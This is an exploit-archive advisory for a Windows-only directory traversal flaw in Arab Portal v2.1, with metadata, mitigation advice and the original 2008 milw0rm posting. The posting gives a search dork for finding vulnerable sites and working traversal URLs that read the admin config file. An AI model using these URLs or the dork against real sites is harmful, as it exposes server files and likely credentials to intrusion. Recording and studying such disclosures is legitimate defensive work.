Arab Portal v2.1 Remote File Disclosure (Win32)

vendor:

Arab Portal

by:

IRCRASH (R3d.W0rm (Sina Yazdanmehr))

7.5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: Arab Portal

Affected Version From: v2.1

Affected Version To: v2.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Arab Portal v2.1 Remote File Disclosure (Win32)

A vulnerability exists in Arab Portal v2.1 which allows an attacker to remotely disclose files from the server. An attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. ../../../admin/conf.php) to the vulnerable server in order to access sensitive files. This vulnerability only works on Windows servers.

Mitigation:

Ensure that directory traversal sequences are not accepted in HTTP requests. Ensure that all sensitive files are stored outside of the web root directory.

Source

Exploit-DB raw data:

#####################################################################################
####                Arab Portal v2.1 Remote File Disclosure (Win32)              ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : R3d.W0rm (Sina Yazdanmehr)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
#####################################################################################
#                                                                                   #
#Download : www.arabportal.net                                                      #
#                                                                                   #
#DORK : Powered by:   Arab Portal  inurl:mod.php?mod=html                           #
#                                                                                   #
#####################################################################################
#                                       [Bug]                                       #
#                                                                                   #
#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\File.Type                 #
#                                                                                   #
#Config File :                                                                      #
#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\..\..\admin\conf.php      #
#                                                                                   #
#Note : This bug only work on windows servers .                                     #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-11-06]